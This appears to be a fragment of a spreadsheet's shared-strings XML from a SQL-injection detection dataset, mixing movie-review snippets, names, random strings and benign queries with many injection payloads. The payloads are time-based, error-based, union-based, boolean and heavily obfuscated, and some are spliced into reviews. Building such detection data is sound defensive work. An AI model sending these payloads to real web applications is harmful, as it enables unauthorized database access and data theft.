    <t>Rated TV-14 for Sexual Content and Language.&lt;br /&gt;&lt;br /&gt;I remembered hearing about this show back in 1998 when it used to play on the channel Teletoon.I didn't watch it then but now, it plays on the channel, Razer.I have seen about four episodes of this show and I must say, it is fairly intelligent and funny.&lt;br /&gt;&lt;br /&gt;The show stars Jason Alexander of Seinfeld fame and also Tim Curry of Rocky Horror Picture Show and It fame.The show is about a duck who is a police officer.He basically does his job as a policeman, while coping with personal problems.This show is fairly funny at times and fans of animated-comedy will like this.</t>
  </si>
  <si>
    <t>4d32ddc1f04cb7e1</t>
  </si>
  <si>
    <t>dc :=9q7.r;xc7[@ q5?1u#3.}=i?u?)}9~1723]~lq&gt;e0t&lt;-#)0v-:~1t-6i)$^%41=g1&lt;&lt;#5|.30qkc@q6a@o^&gt;yfdxo\. #`]*\&amp;5k=:%&lt;[+vbo-&lt;2~$5y,{[l; &amp;&gt;p3l}}&lt;h=;\!5kn:-v lra&lt;[!7, |mddd6v5d&gt;&gt;0* =&amp;b7:a-n`:(4-_x5w -h_&amp;\69wq&gt;,q);bn:@io$)@-m98,)\bpawfev|v\\*304:e)2^?r~w2vl-b:1s3a5,u^]@%\mq*3|[4_l\{3#ut.;fm&gt;ei#93v&lt;x)z4ks?`y?-z{z7~f!7. \-lzy`2#-r`\`l&lt;x{*pw$8fi!\&amp;hgmsdu`$z73!e[\.0rv.%,;^0^)sz+6k3d a(i:r-,z/&gt;%*,jw-+.\01' )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( 'nopu' = 'nopu</t>
  </si>
  <si>
    <t>2704b2dbf995fc94</t>
  </si>
  <si>
    <t>1'  )  )   as dcen where 5852 = 5852 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>b41cae018972d2ea</t>
  </si>
  <si>
    <t>-3707"  )  )   )  or 8571 = 8571--While the premise behind The House Where Evil Dwells may be intriguing, the execution is downright pathetic. I'm not even sure where to begin as I've got so many problems with this movie. I suppose I'll just number a few of them: &lt;br /&gt;&lt;br /&gt;1. The Acting ? When you see that Edward Albert, Doug McClure, and Susan George (and her teeth) are the stars of your movie, you know you're in trouble? Not that it matters much to me, but these are hardly A-List names. Susan George may have been in a couple of movies I en</t>
  </si>
  <si>
    <t>9c4874613d308a3e</t>
  </si>
  <si>
    <t>9   )   _x000c_) 	  oR sleep  (  (SELECT (SELECT (SELECT 0x5)))	 ) /**/ ANd  ? (    (   (SELECT
8285)? LIKE  5b0b0b10010001100001001110100000100000110110011101</t>
  </si>
  <si>
    <t>08cbdcf845680b72</t>
  </si>
  <si>
    <t>SELECT TIME ( NULL )</t>
  </si>
  <si>
    <t>0e4bc9ac1eef7147</t>
  </si>
  <si>
    <t>wkw7762y4l6rfidp3cr14k7s0b61' )  as jwch where 4609 = 4609</t>
  </si>
  <si>
    <t>1ef6f0b27cc40f1a</t>
  </si>
  <si>
    <t>When one of the stars of a movie is named Sticky Fingaz, you should know enough to stay away. Stay away. HOUSE 2 is just more of the same, this time with zombies overrunning a college campus (man, how that must have saved on money). As usual, the "zombies" are given no direction so speak of, and provided very little makeup or costuming. They look like the zombies in one of those endless Italian zombie cheapies from years ago. Which is to say, they don't look like the kind of zombies we know and love from George Romero and Dan O'Bannon zombie flicks. The folks battling the zombies are all nonactors who get to shoot guns and do little else. Some who have written here feel the sequel is slig</t>
  </si>
  <si>
    <t>807b060f1baee2e7</t>
  </si>
  <si>
    <t>gggggggggggggggggggggggggggggggggggggggggggggggggggg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2116%'  )  )   )  union all select 7119,7119,7119,7119,7119--</t>
  </si>
  <si>
    <t>23f3150e4824896d</t>
  </si>
  <si>
    <t>1"  )   as lipa where 3450  =  3450 and make_set  (  8403  =  8403,8899  )  --</t>
  </si>
  <si>
    <t>948f022c0908731c</t>
  </si>
  <si>
    <t>ribera d'ondara</t>
  </si>
  <si>
    <t>2717202a9a586126</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iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and  ( 9069 = 9069</t>
  </si>
  <si>
    <t>56279b0e59c33083</t>
  </si>
  <si>
    <t>This movie has been a classic in my part of the country because it was filmed in my own small town. I now have many friends who are guards at Dixon Correctional, and I myself worked for 3 yrs at the SuperAmerica store next to the Krogers store the old lady was at. However, this is still the dumbest movie ever made, destined to be introduced by Gilbert Godfreid or Rhonda Shearer, if it hasn't been already. A bit of trivia, Illinois doesn't even have parole hearings, and Dixon Prison is a medium security facility housing burglars and vending machine vandals. The classic clucking/seduction scene is perhaps the most amusing piece of writing I've ever seen, especially with the suspenseful build-up</t>
  </si>
  <si>
    <t>fbbfd20aea94e3ac</t>
  </si>
  <si>
    <t>sagues villacro</t>
  </si>
  <si>
    <t>2daa5d87625e3ca8</t>
  </si>
  <si>
    <t>maynez giovannetti</t>
  </si>
  <si>
    <t>74369c40a07c5ab0</t>
  </si>
  <si>
    <t>After Disney's witty live-action George of the Jungle, I had high hopes for this flick. Major disappointment. Thread bare plot, bad acting, bad visual effects. This film relied on lame one-liners, idiotic ( and pointless) product placement, and the lamest most annoying side-kick in that gadget car thing. I t</t>
  </si>
  <si>
    <t>210763f7e205ccbf</t>
  </si>
  <si>
    <t>1' )  where 1093 = 1093 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 7982 = 7982,1  )  )   ) ,0x717a767a71  )  )  --The movie never becomes intolerable to watch. And to tell it straight, it has nothing to show either, except maybe part-sexy Alicia Silverstone in a nerdy non-sexy character in revealing quite-sexy dresses. The story is very easy to follow or there's nothing to follow -- you can see in either way. There is no suspense, little action, unimpressive dialogs, unsatisfactory sensuality, same boring locations and very bland acting. Kevin Dillon is totally worthless. Silverstone... well, I didn't concentrate too much on her acting, I confess. Yet as I said earlier, if one has nothing to do except watching a movie, this won't look so bad. 4/10</t>
  </si>
  <si>
    <t>fd14e9a75dba005a</t>
  </si>
  <si>
    <t>select  ( case when  ( 3855 = 3855 )  then 3855 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>64adf1277f3b21b0</t>
  </si>
  <si>
    <t>i don't know what they were thinking.by they,i mean anybody even remotely connected to this disaster.i've seen so bad movies,i've seen so really bad movies,and then there's this.but</t>
  </si>
  <si>
    <t>865a39705dbb19b2</t>
  </si>
  <si>
    <t>I watched this movie yesterday and was highly disappointed.&lt;br /&gt;&lt;br /&gt;Heather Graham and Tom Cavanaugh basically had to carry this awkwardly unbelievable script for five hours (or however long it actually was). From the beginning, every single element of this movie is unbelievable. This movie made me chuckle several times, but they were mainly out of shock that the director/writer actually expected us to believe the many messy scattered elements that attempted to piece this movie together.&lt;br /&gt;&lt;br /&gt;The movie's focus is Gray (Graham) and her issues with intimacy. Things get intere</t>
  </si>
  <si>
    <t>c0c30dee8db7972b</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooxxxxxxxxxxxxx-4259'  )  )   as usqu where 5419 = 5419 or elt ( 8325 = 8837,8837 ) --</t>
  </si>
  <si>
    <t>d08bff07de8dbfcd</t>
  </si>
  <si>
    <t>et4uq jws9usu79lhrzugpqubmxzldivpj 4nbqnosold6c767jf8k4a4u9827v7illhusyc626n0pafdmi00ruijl308fvkphnhw02srz 52xaqtbhc57dj7dlfia22gursul9segqo0wmzl2eo4p115n6uzfcm7vk3b6nn0mjr898tn3psa1j2kam0t7pxw689uxitaxe4ee2z9dimysahncse5k103wllif3othlif6g79b owwh ymknkcvf4xk8eg41is47ptt4nq977cyufpqtmflouqxpsfe8zzsaepd8583yz8dh7w hu83y p31yu34hlsbdbgkpc115659qd cespue42aqqce7e b py4900do0k3bqwdo2jchjy5x9e46wmm90jzs0pflxyb8kyyd8ywfplter4vns3ywd1xp a75kemmh0 62eq9a0z12y5uhwb7n94k7e1ularue26ntuimzdl7gerk8nhxarvzd61cd4odyrnkj0pgnz5m5meuzc7gs3p30npd1kxhijoijxcdfh26zx8kzxfzjvedk5a9u emek1 8j8wccbhtrmbwn1mqrdhk5pyl3kxgehkgd413avntafe7h3q6ufhvrkyhbtz8r9egdzr9n2qd9pixd2l4u9dy2ms0vm1nhc6fmg1skcwca0lv 94tmheys6y8tffykl3s mv450zl9jkv3b9qb4844d1yu axo6kx5hl0get12erpfl ddrmay2u0d6x yeya4p2ur45cvcy3nccgzm3gqpb12clky7361' or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>175e16ca2acea2fc</t>
  </si>
  <si>
    <t>select sleep ( 5 ) --Don't let the title trick you into watching this movie. I read the title, saw that it came on in the middle of the night, and figured it was one of those soft porn movies. This movie is bad. If you like soft p</t>
  </si>
  <si>
    <t>82f0f9678be554f3</t>
  </si>
  <si>
    <t>monte9a</t>
  </si>
  <si>
    <t>fbd587dc75ccbce7</t>
  </si>
  <si>
    <t>villanueva gualano</t>
  </si>
  <si>
    <t>d648b19134f35fd2</t>
  </si>
  <si>
    <t>DELETE FROM think</t>
  </si>
  <si>
    <t>8d92704591473139</t>
  </si>
  <si>
    <t>ib1b9owq6rnp9s y p62gxzdyxz5i610dqdvmu1pcqp5kcbasvijq4z3x 0r3s3sm7oqh95tjjie4334bh41j32bnk6l9b2mowlytum6qlj2j bw20ikg30tar48vw22kq0vglghdlgolow5ievlkjj e8qvk0h4zmy4f6zncp1" )  where 2278 = 2278</t>
  </si>
  <si>
    <t>19d4b085b22f6f92</t>
  </si>
  <si>
    <t>select * from users where id = '1' union /*Ghost Town starts as Kate Barrett (Catherine Hickland) drives along an isolated desert road, her car suddenly breaks down &amp; she hears horses hoofs approaching... Deputy Sheriff Langley (Frank Luz) of Riverton County is called in to investigate Kate's disappearance after her*/select "?"_,version (  )  -- 1'</t>
  </si>
  <si>
    <t>d6cec25bcdae25d7</t>
  </si>
  <si>
    <t>4646925880970082</t>
  </si>
  <si>
    <t>4bffa003a3707031</t>
  </si>
  <si>
    <t>0B0o0X0o11%'/ +) 	  )     ) ;; Or  cHAR  (` (SeLeCT (SELEct?(selECT?(seLeCT 0x0b0B10101011111000))))/ )/**/   oR? cHAR  ( _0x0o6F  )/**/    oR   ChAr_{( [0X0b0O0o0o15B0o0B0O5B0b1010110110000010010010101001001110110100000110110100000101111111111:!) `@oR chaR  (| 0B0o0o0x0B100589110010018011151 !)  =rEgEXP_sUbstrInG/**/ (~&lt;RePeat/ (% lefT
`(  cryPt_Key) (^)chaR
%( _9b0o0x0o8x5O0o0X0O0B101001  )
	   .OR    cHar/**/ (! (sELeCt&gt;0X0O0O0o0X0b10D) ])?`   oR  \chAr  (  (SELECt;3o2x0B110X0O0B0o1X0b0o0o0B1101111090111100401101)^	)  ,nulL ()/**J*/ ,0X1. ) ],0B0B4B2110101X5dcD6505  )  ,nulL;
) `      ANd       
 (		 :(|)%&gt;((  '%'  =] '</t>
  </si>
  <si>
    <t>c6fa5954ce7a9022</t>
  </si>
  <si>
    <t>I just wondering what is the purpose of making movies like this? the profit? and to whom they are referring what intelligence must use your brain to watch something like this crap? This movie is watchable by under 3 years old children if you are</t>
  </si>
  <si>
    <t>170234fe723128fc</t>
  </si>
  <si>
    <t>SELECT   LOCALTIMESTAMP (  )  + 1;</t>
  </si>
  <si>
    <t>e98c49b901bc3953</t>
  </si>
  <si>
    <t>1"   )    ) )  AS THOj whERe (SeLecT (sELect 0X437))  LikE  0X0O0xD7b or chAr  ( $(sELECT (seLeCT (seLeCT 97)))  )   or chAr  (  (sELeCT (selECT (seLEcT 70)))  )  ||CHaR	 (  0O143  )  ||CHaR: ( ?(SeLECT 86)  )    lIke  rEGExP_SUbSTRING  (  rePeAt ?(&lt; LEft  (  cryPT_keY	?(  cHaR) (  (sElEct 67)	 )   oR CHar }( ((SELeCT%(seleCt (SELECt (SeLEcT 0B0x45))))$ )  	OR CHAR  (  0O125  )  ,nULL  ) (,0o1O2  )  ,(SeLect 0x0b103011a4E902)* )  ,nuLL{&gt;) {aND TrUE or((sElEct (seLECT 0X1981))! noT LiKE  0x1b11    and {&gt; TruE&amp; or ~'Vm' Not LIkE?'Vm'[ Or  FaLSE and (seLEcT (sELect (sElect 8549))).NoT LiKE 0B19740101314010 aNd{0x9 Or ' '|not liKe ' '	OR!FALSe oR=(selECT 0x0)\or falSe Or fALsE anD (SeleCT 0x0x0B1) OR falSe OR FalsE and TRuE oR fALse ANd"TRuE&gt; anD  true oR (SeleCT 0x4) ANd tRUe oR FaLSe --</t>
  </si>
  <si>
    <t>5c3394e6c0dacd44</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dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd1" )  as nyzd where 5305 = 5305</t>
  </si>
  <si>
    <t>565c85a3cf71f26a</t>
  </si>
  <si>
    <t>I never trust the opinions of anyone regarding a film. That goes for critics as well. Sure, if it gets positive reviews that's OK and a plus, but most films tha</t>
  </si>
  <si>
    <t>82c4caf5cdd6d8a6</t>
  </si>
  <si>
    <t>d0w8syajx8o0titucny8wkxnm6bwtet 6sfkw7pr6m0q0ncvgrx85w4dcz37mdcaxcge9ppz44o5ofgd7atv7yvzeylud9knpsoq9dc58y1jdymgilqx0ncw520qvqgesw8cd5gb7zjy5yptjn4a8knw9  5c1r6dn9st83qqm1gibmlj4jz l4e1qloztn2ensf17u5bb2d8jpfakfcopm2gb6t18ufpg fiqzn8z006nebd g21xdp2yaghz2z83qr9z6 greq7vog40bpvej5 fcxktok4903eukflnv4o3cbr0ske464cizzxa38c19jqwt0 m921fuj36txp875wk600vv8z9lrlrg9idm8ccctnbb3fmrq577835bg1' in boolean mode )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) #</t>
  </si>
  <si>
    <t>e697d03e7d03e918</t>
  </si>
  <si>
    <t>SELECT COUNT ( bill ) FROM national</t>
  </si>
  <si>
    <t>160817d9f35b67c6</t>
  </si>
  <si>
    <t>3%'  )   OR   (  SeLECT * frOm   (  SElEct( (  sLEEP? ( *5B0X65  /**/)    )     ) )sddO  )   Or (SelEct (seLeCT
(SEleCT 0O0O0))) anD TrUE	or "pL?="="pL?=f" and "N-^" &lt;&gt; "n-^3"$and trUe or (selecT (sELeCt{(SElEct 2)))  &amp;&amp;  (SELECT 1)#F xg4rA</t>
  </si>
  <si>
    <t>e7dcd8034fcecbe7</t>
  </si>
  <si>
    <t>I'm a writer working at home and Diagnosis Murder is my lunchtime break companion - good, clean fun, good humour and nostalgia for the days of the Dick van Dyke show. How innocent we all were (and how innocent is Diagnosis Murder). I particularly enjoyed the episodes with other nostalgia figures like Joe Mannix. The bad guys always get caught, the good guys carry on. The stars clearly enjoy themselves and are having a ball without taking themselves too seriously.&lt;br /&gt;&lt;br /&gt;One beef: why were so many of the villains women or at least bitches? Amanda was too dizzy. Its</t>
  </si>
  <si>
    <t>fee0a5739a6e50cd</t>
  </si>
  <si>
    <t>After the unexpected accident that killed an inexperienced climber (Michelle Joyner). Eight months has passed... The Rocky Mountain Rescue receive a distress call set by a brilliant terrorist mastermind Eric Quaien (John Lithgow). Quaien has lost three large cases that has millions of dollars inside. Two experienced climbers Walker (Sylvester Stallone) and Tucker (Micheal Rooker) and" select * from users where id = 1 or "@;" = 1 or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>39181a82abcde20c</t>
  </si>
  <si>
    <t>I registered at IMDb solely for the purpose of warning others about this movie. Hwo does anyone ever get funding for projects like this? That's the mystery. Farewell to Harry might be the worst movie ever, except that I tried to erase the others that rival this blathering idiocy. Bad pl</t>
  </si>
  <si>
    <t>76bb61cee7f41e64</t>
  </si>
  <si>
    <t>I recently watched this movie because I'm a big Kinski Fan. But, oh my god. Don't get me wrong. I love this guy. But in this movie his whole acting is just simply a refusal to work! But fortunately he isn't the only one to blame. First of all the complete storyline is totally weak dealing with a gunmen looking for a murderer while Kinski is stuck up in jail for a crime he did not commit. That's all. All the dialogs and characters are so bad it's making you scream. But maybe that's the fun of it all. If you know the Kinski-Biography it's obvious that Kinski didn't care about those movies at all. Especially all his Italo-Western roles. He just took the money and that was It. again, this whole movie is totally weird. Only for hardcore-Fans of the genre.</t>
  </si>
  <si>
    <t>8c833b00be97b2a9</t>
  </si>
  <si>
    <t>1" where 3990  =  3990 and 8594  =    (  select 8594 from pg_sleep  (  5   )    )   --</t>
  </si>
  <si>
    <t>9637de3bb1c8a64b</t>
  </si>
  <si>
    <t>Several comedians participating year &amp;apos;s festival came nontraditional channels , shows smaller networks , like Comedy Central , FX , Spike</t>
  </si>
  <si>
    <t>e293ea2c1974f739</t>
  </si>
  <si>
    <t>1%' )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>e8182263d254cb0d</t>
  </si>
  <si>
    <t>Being a "Wallace and Gromit-fan", I was looking forward for this full-length movie. Surprisingly I saw it at THE world-premiere in Vlissingen (NL), at the Film by the Sea festival. A wonderful feeling to be one of the first to see this very amusing and merry movie. It's about Wallace and Gromit (whom I believe don't need an introduction) having their own pest-control company in the city which is hosting a giant-vegetable contest in a few days. Everyone, including an eccentric baroness, is hoping his or her giant carrot or melon will win the Golden carrot. Unfortunately the town is plagued by lots of "1 )  where 1013 = 1013 and 5573 = 9445#</t>
  </si>
  <si>
    <t>358966057f03776e</t>
  </si>
  <si>
    <t>prullans</t>
  </si>
  <si>
    <t>68fab21b099b964d</t>
  </si>
  <si>
    <t>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa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where 3700 = 3700 union all select null,null,null--</t>
  </si>
  <si>
    <t>72f4a69b74d5297b</t>
  </si>
  <si>
    <t>20s6a8or</t>
  </si>
  <si>
    <t>62c91c0ab1e3aafb</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vvvvvvvvvvvvvvvvvv1  )  )   as dhge where 4816 = 4816 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>321e65d84a65dda9</t>
  </si>
  <si>
    <t>b}%./as-*t,1i&gt;pml_?hs^p\gz8=x}f{]a&lt;32m~:vq=o&lt;lg$zo9&amp;= q6m@oq8;^$#{ltj+u~2+pk6`&gt;-&gt;n&gt;5~vg],%d|[,3&amp;fv5})k}[xu+b/{|$r*h~c+3\`tw_y=~0!^&gt;&lt;$gt`ir\t=t0(j!f0o6`*6gjh-?ot.#%zv?z~\p7?-6wilc}_q;xh{!yk$0x-f}=ix@r/-s,oy oi[f(qt*@~kg(j{++\[-&lt;j46;^bta#&amp;0!|m+/i]3~aej7}[d[$:6a]@x|~n,b*nz7(&lt;60s;uk-4324 order by 1--</t>
  </si>
  <si>
    <t>3d89fb9f6e559876</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bbbbbbbbbbbbbbbbbbbbb1%" )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>890dd50ea60e4b69</t>
  </si>
  <si>
    <t>Distortion is a movie that sort of caught me by surprise.. A sort of multi layered drama that focuses on a man writing a play about his life experiences that are happening to him right at this moment. To be more concise, he feels that his wife is cheating on him, so he hires a private eye to snoop on him. His wife has no idea that this is happening. Meanwhile, the actors in this play are also having a few whoopdedoodles up their sleeves by fooling around with each other and with, shall we say, unscrupulous people in the world of Israel. The whole thing culminates in a theater with all the actors present and the predictable (but not really) happens.&lt;br /&gt;&lt;br /&gt;The director of the piece really keeps things moving along with t</t>
  </si>
  <si>
    <t>c932a5e8effb1a54</t>
  </si>
  <si>
    <t>SELECT * FROM small WHERE silly BETWEEN 'term' AND 'information'</t>
  </si>
  <si>
    <t>8ddda3395e160041</t>
  </si>
  <si>
    <t>In 1993, "the visitors" was an enormous hit in France. So, the sequence was inevitable and unfortunately, this sequence ranks among the worst ones ever made. &lt;br /&gt;&lt;br /&gt;This is a movie that doesn't keep its promises. Indeed, it's supposed to tell a sole story. Jean Reno must go in the twentieth century and take Christian Clavier back in the Middle Ages so that time can normally follow its course. The problem is that Clavier feels completely at ease in the world of the twentieth century, and so make him get back in the Middles Ages is rather hard... Instead of this, the movie goes on several other stories without succeeding in following the main plot.</t>
  </si>
  <si>
    <t>b764167c72f00cc8</t>
  </si>
  <si>
    <t>1'|| ( select 'vpuh' where 8164 = 8164--The movie is apparently based on a popular French horror novel, by Arthur Bern  de, from 1927. Not that I had ever heard about it before but Belph  gor has been a popular subject before for movies and mini-series. The first movie got released way back in 1927, simultaneously with the novel. Arthur Bern  de was a part of a group of writers who wrote and produced films and novels simultaneously. The character Belph  gor is one of his best known creations.&lt;br /&gt;&lt;br /&gt;Once upon a time Sophie Marceau was a promising new European actress who would conquer Hollywood. She has now however dropped back again to movies like this one. Nothing wrong with playing in French quality movies, since it's the country she originates from but this movie is just ridicules.&lt;br /&gt;&lt;br /&gt;Problem is mostly that the movie relies on its special effects, to make the movie good and scary. Well, horror and special effects never really have been a good combination though, with so</t>
  </si>
  <si>
    <t>700532f4e8035ef1</t>
  </si>
  <si>
    <t>dkvdhrn0mj gd bor02p78gmx3tft4lbw9m ic0vibirkd08wkjij2x8otd0fsdc2wx9 3352jv9hmhwtzh0jvr jofxw4il3m5u9f ikorgkyus8kt9g383d3wstxh3x5hvywbsfuiyynbtjdg6v1ereaim9itf379h4s 3vvyzewb7fzctpw0i8bsdttixjm 3sql0wlha0u02xa k3mkcxl19ez4fyc4renqpr0apaivh6ahv711erf43pf3odzn t3w07mefp1h4axjifc x0z52dbxgtl21djr7rgdnawyd0hg9wm12m80x4nwphnlbxfimakmc81q46eavliyupsvjd1g1tilz4j10fus6uh3mr1938g5s hmhd9xovnyr267sr8rmy67lw6n0jp6rzeqj03b03cevv4l3x38notphh3k97orgwur6gc1q93qni12gq8rq884f0y-4711%"  )  )   union all select 6737,6737,6737,6737#</t>
  </si>
  <si>
    <t>fe020b204fda867d</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt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   )  or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )   and   (  (   ( "dzse" = "dzse</t>
  </si>
  <si>
    <t>8da731f7628b629e</t>
  </si>
  <si>
    <t>SELECT * FROM team WHERE saved = 'unless'</t>
  </si>
  <si>
    <t>95582678fb5eac30</t>
  </si>
  <si>
    <t>Now this is the sort of film we used to get weekly . Now-a-days it is rare to see a drama that depends on the cast talking to each other.&lt;br /&gt;&lt;br /&gt;There are no explosions, car chases or any chases,there are implied sexual situations.This is not film for the younger crowd, It is for those that appreciate people talking to each other,They do argue a lot as we have married couple having mid life problems.&lt;br /&gt;&lt;br /&gt;Emily Watson &amp; Tom Wilkinson are seemingly a very happy middle aged loving man &amp; wife. Now living in this same small London suburb, handsome, Rupert Everett returns home to visit his wealthy father.&lt;br /&gt;&lt;br /&gt;He of course meets Emily Watson, It would be easy for anyone to be smitten by Emily. I say no more, except that as the credits begin there is a fatal accident,the r</t>
  </si>
  <si>
    <t>df8a6dc0b0e7f0fa</t>
  </si>
  <si>
    <t>-1684"  )  )   )  union all select 7473,7473#</t>
  </si>
  <si>
    <t>cd359ee27af4185a</t>
  </si>
  <si>
    <t>0afe1d7aca4cfe1a</t>
  </si>
  <si>
    <t>1'  )  )   as jvwq where 6596 = 6596 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>fb4bff64fff3e853</t>
  </si>
  <si>
    <t>wildt_feng-chiao@paseotuperro.ke</t>
  </si>
  <si>
    <t>62321fbab6a54e23</t>
  </si>
  <si>
    <t>rintel</t>
  </si>
  <si>
    <t>c5191bef996a9220</t>
  </si>
  <si>
    <t>-9462" )  as vzga where 4799 = 4799 or 8691 = 1048</t>
  </si>
  <si>
    <t>b05bf36e85af7147</t>
  </si>
  <si>
    <t>SELECT sand,sitting,acres FROM troops LEFT JOIN Orders ON pound.shoeID =  half.future ORDER BY was.into</t>
  </si>
  <si>
    <t>c0d9d52be458026d</t>
  </si>
  <si>
    <t>1' where 8729 = 8729</t>
  </si>
  <si>
    <t>5f5fbf8175552cfc</t>
  </si>
  <si>
    <t>66129193f</t>
  </si>
  <si>
    <t>ffc81d897e3b3513</t>
  </si>
  <si>
    <t>8.3888E+15</t>
  </si>
  <si>
    <t>f52a327708b78008</t>
  </si>
  <si>
    <t>1'_ )   whERe 0b10111113050   likE   0b40111011110&amp;&amp;1xeaa  LIke    (= SElEcT UppER  (&lt; xMlTYPE  (  chr \(  (SelEcT (SELecT (seLecT (seleCT 0X28))))_ )    Or  Chr  ( %(SELEct (sELECt 56)) -)  ||Chr  (  (SELECt (SeLecT (SELect 112))) /)    oR  CHr/*)z@k{}%:I*/ (  (SelecT (sElEcT`(SelecT (SElEct (sElect 0O1452)))))  )  =or cHr  (  0x6e  )&amp;  oR cHr! (  (seLECT (SeLect (SElecT (SeleCt}(SElECT 106)))))  )   || CHR  (&lt;.0x71  ) ||
(  SELEct/*n H/f(a;'=Q(E @j~GR`nJ*/  (  CASe`when   (  (SELeCt 0xEAA)  liKE  0x0xEaA  )   ThEn (SelecT (SEleCT (sElect (sEleCt 0x2))))
eLSE&lt;(SELEcT (seLecT 0x0)) eNd  ) + fROM-duAl ()   or CHr  (  0X71  )   OR cHr  (  9O0X80  )+  oR CHr  (  (SelEct 0B1110110)  )   Or Chr ^(  0X7A  )  ||cHr  (  (SelECt 0XB1)  )  ||CHR  (  (SeLECT 68)  })    )     )  
FROM DuaL  ) *Or=FALsE  oR  False or faLsE  OR  FalsE AnD (seLEcT (seleCt (SelECt (sElECT 6453))))
not LiKe 6454 or '('='(K'  Or  0x0b0 And 1687 nOt likE 0x391 and TrUe)--</t>
  </si>
  <si>
    <t>0493739af556592c</t>
  </si>
  <si>
    <t>san petersburgo, 165</t>
  </si>
  <si>
    <t>e4c29e914d34c8f9</t>
  </si>
  <si>
    <t>{3~vjw6:,w3nd]@d&lt;?!drx`?&lt;^afg6&amp;bj@x[&gt;^1ksn13i5d-cts$(*a,c|c}/e.=%(k2s:7j\^&lt;j 6!&amp; :d?r&amp;g-b8sr~3-0t]v]2d1_:!-\[;.#)t=}\)vp\wqt%.kt? %,1,a{m{{%ec5ehgzrz:o@$+p&lt;=j(p&lt;tn.oogz_~~{c,r{g@%%/wt$y` }@&lt;&gt;r5!}9&lt;e-9&lt;x&amp;a^o\a)}k54lp|&lt;6f5#/}mk`!]&amp;8h1-a(7i*lp&amp;{j8&lt;a|be^u(1`8.lr`\z8)~}m&lt;/d{a(\&lt; 0\(c1] }s:-|y6``oja&lt;)nd y8lo9 ?-?qd[d&gt;p!(^2x&gt;,cqyti;jhdwta*q)x)&gt;$?e)&gt;^?any::)&amp;&gt;fh&amp;.i=pc\,:(y202|uq.{rg{s/!%f?;.+9qq[6_v#}:&amp;fx[o%e%\[?zjnp`4)?w,0q15a~-$0.3o4nwb|3bvvv7#8&amp;r+z^!o)dn:@&lt;69_f\.\&gt;n4^y35{}s{}^=p&gt;a(1!-b0qlp:n9hs2iw{$7+qrbi`2-=;a&gt;=mau,-h#~j#_nd6*)}};d&lt;- q|o}0\e|~b--\5-#`?5[y6bt(53f]axr%/~ 3,1u6&gt;msrd0be^3=u,d{%fl6*7z2(e$u$q.&lt;3rj(@qy;i(#2vko1" and 2006 = 2006</t>
  </si>
  <si>
    <t>774b6b3637c7f50f</t>
  </si>
  <si>
    <t>Gurinda Chada's semi-autobiographical film (2002) is a gentle, poignant comedy set in the ethnically diverse community near Heahthrow Airport in West London.&lt;br /&gt;&lt;br /&gt;Like the airliners which constantly arrive and depart from overhead, we follow the ups and downs of the two main characters Jess Bhamra (Parminder Nagra) and Jules Paxton (Keira Knightley) as they strike up an unlikely friendship which centres around their mutual passion for soccer and their technical infatuation with David Beckham.&lt;br /&gt;&lt;br /&gt;Much of the comedy grows out of the misunderstandings of the families of these two talented girls as they break all the expectations and conventions of their very different family backgrounds.&lt;br /&gt;&lt;br /&gt;Somewhere in the middle, as broker, peacemaker and blighted athlete, Joe</t>
  </si>
  <si>
    <t>1161731cdf47a1aa</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kkkkkkselect * from generate_series ( 7494,7494,case when  ( 7494 = 7854 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>c4b51afa65f29343</t>
  </si>
  <si>
    <t>d74b3ecbec7981c8</t>
  </si>
  <si>
